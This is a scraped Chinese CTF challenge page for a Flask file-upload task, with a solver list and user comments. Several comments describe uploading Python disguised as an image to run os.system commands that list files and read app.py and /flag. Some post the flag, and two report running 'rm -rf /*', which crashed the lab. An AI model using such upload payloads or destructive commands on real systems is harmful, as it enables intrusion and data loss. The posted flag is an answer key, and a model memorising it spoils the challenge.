Flask_FileUploadWEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Lazzaro
一血奖励:
3金币
解 决:
12573
提 示:
描 述:
Flask_FileUpload
评分(20)
解题动态
一只小白鲸 攻破了该题 1天前
Wu. 攻破了该题 1天前
qq1002517 攻破了该题 4天前
hdcc1 攻破了该题 7天前
藏在云层里的羊 攻破了该题 13天前
,, 攻破了该题 13天前
flag大王 攻破了该题 13天前
乱来小木 攻破了该题 13天前
xyqsin 攻破了该题 14天前
无情的白给机器人 攻破了该题 16天前
等往事风中吹‘ 攻破了该题 16天前
scv 攻破了该题 17天前
Digbick916 攻破了该题 17天前
Fengyu3321 攻破了该题 17天前
Xl2219 攻破了该题 18天前
chenzhong 攻破了该题 19天前
0xchang 攻破了该题 19天前
15144954824 攻破了该题 20天前
kiritoldws 攻破了该题 20天前
评论
kygahd 3年前
举报
我的方法是, 首先建个test.jpg 文件, 内容是python代码 import os os.system('ls -la') 执行系统命令列出当前文件夹的所有文件 用burp上传以后返回的结果里发现当前文件夹有app.py. 然后修改test.jpg 为 import os os.system(“cat ./app.py”) 来查看网站源码。 源码里发现一段代码为 shell('ec
Epiphany777 3年前
举报
jpg\png python 抓包 import os os.system('cat /flag')
zuoqirun 3年前
举报
flag{1c6b553c3a91791993b859e1625275ac} rm -rf /*场景炸了
uzzzzz 3年前
举报
编写一个文件 test.py, 文件中的语句为: import os os.system('ls -lat ../') os.system('cat ../flag') 将文件名改成test.py.png, 在burpsuite中改包filename=test.png
ttxs25830 3年前
举报
草,我传了个rm -rf /* 上去,似乎没有都删掉,但是场景真炸了......
GH0S7 3年前
举报
hhhhhhhhhhhhhhhhhhhhhh
bracket 3年前
举报
oh.cool
maomaoha1 3年前
举报
Traceback (most recent call last) File "/usr/local/lib/python3.7/site-packages/flask/app.py", line 2464, in __call__ Open an interactive python shell in this framereturn self.wsgi_app(envi
chengzhang 3年前
举报
666
·w· 3年前
举报
我觉得好难啊
nauyx 3年前
举报
easy
泡椒控卫 3年前
举报
https://blog.csdn.net/m0_57954651/article/details/123335889?spm=1001.2014.3001.5501